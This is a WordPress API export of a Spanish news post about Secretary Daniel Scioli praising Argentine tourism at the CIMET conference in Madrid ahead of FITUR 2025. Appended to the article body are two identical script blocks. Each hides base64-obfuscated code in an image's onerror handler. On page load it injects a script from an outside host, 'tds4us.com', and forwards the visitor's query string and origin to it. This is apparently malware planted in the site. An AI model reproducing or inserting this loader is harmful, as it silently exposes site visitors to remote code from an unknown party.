{"id":4751,"date":"2025-01-21T10:16:31","date_gmt":"2025-01-21T13:16:31","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4751"},"modified":"2025-08-13T23:42:22","modified_gmt":"2025-08-14T02:42:22","slug":"scioli-la-nueva-argentina-esta-viviendo-un-momento-maravilloso-para-el-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4751","title":{"rendered":"Scioli: \u201cLa nueva Argentina est\u00e1 viviendo un momento maravilloso para el turismo\u201d"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\"><em>Ante ministros y empresarios iberoamericanos del sector, subray\u00f3 la vuelta al cr\u00e9dito y la seguridad jur\u00eddica y ciudadana como factores clave para su desarrollo.<\/em><\/h3>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,\u00a0<strong>Daniel Scioli<\/strong>, dijo hoy que\u00a0<em>\u201cla nueva Argentina est\u00e1 viviendo un momento maravilloso para el turismo, un sector que el presidente Javier Milei defini\u00f3 como estrat\u00e9gico para la recuperaci\u00f3n del pa\u00eds\u201d<\/em>.<\/p>\n\n\n\n<p>Al participar de la\u00a0<strong>Conferencia Iberoamericana de Ministros y Empresarios de Turismo (CIMET)<\/strong>\u00a0convocada en Madrid, Espa\u00f1a, Scioli afirm\u00f3 que en la Argentina actual y a partir de\u00a0<em>\u201cla vuelta del cr\u00e9dito, la seguridad jur\u00eddica y la seguridad ciudadana, est\u00e1n dadas las condiciones para un desarrollo tur\u00edstico sin precedentes\u201d<\/em>.<\/p>\n\n\n\n<p>Entre otros puntos, destac\u00f3 que medidas como la\u00a0<strong>desregulaci\u00f3n de las agencias de viajes y la pol\u00edtica de cielos abiertos<\/strong>\u00a0han permitido avances para el sector con resultados concretos,\u00a0<em>\u201ccomo las m\u00e1s de 70 inauguraciones programadas para los pr\u00f3ximos meses en el \u00e1mbito hotelero\u201d<\/em>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/jet00002.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>En ese contexto, el cap\u00edtulo dedicado a la Argentina de la gu\u00eda para inversores publicada por la&nbsp;<strong>Plataforma de Internacionalizaci\u00f3n Tur\u00edstica en Iberoam\u00e9rica<\/strong>&nbsp;da cuenta del R\u00e9gimen de Incentivos a las Grandes Inversiones (RIGI) que busca atraer&nbsp;<strong>inversiones superiores a los 200 millones de d\u00f3lares<\/strong>&nbsp;en diversos sectores entre los que el turismo est\u00e1 incluido.<\/p>\n\n\n\n<p>La presencia de Scioli en la CIMET es la primera de las actividades de su agenda en Espa\u00f1a que abarca&nbsp;<strong>tres jornadas de trabajo intenso junto a la comitiva de 70 empresarios del sector privado y autoridades provinciales<\/strong>&nbsp;del \u00e1rea que participar\u00e1 de la Feria Internacional de Turismo (FITUR 2025) en Madrid, donde la Argentina cuenta con un stand desde el que se propone&nbsp;<strong>consolidar su posicionamiento como destino tur\u00edstico a nivel global<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/scioli-la-nueva-argentina-esta-viviendo-un-momento-maravilloso-para-el-turismo\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:390px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ante ministros y empresarios iberoamericanos del sector, subray\u00f3 la vuelta al cr\u00e9dito y la seguridad jur\u00eddica y ciudadana como factores clave para su desarrollo. El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,\u00a0Daniel Scioli, dijo hoy que\u00a0\u201cla nueva Argentina est\u00e1 viviendo un momento maravilloso para el turismo, un sector que el presidente Javier Milei [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4752,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-4751","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4751"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4751"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4751\/revisions"}],"predecessor-version":[{"id":6594,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4751\/revisions\/6594"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4752"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}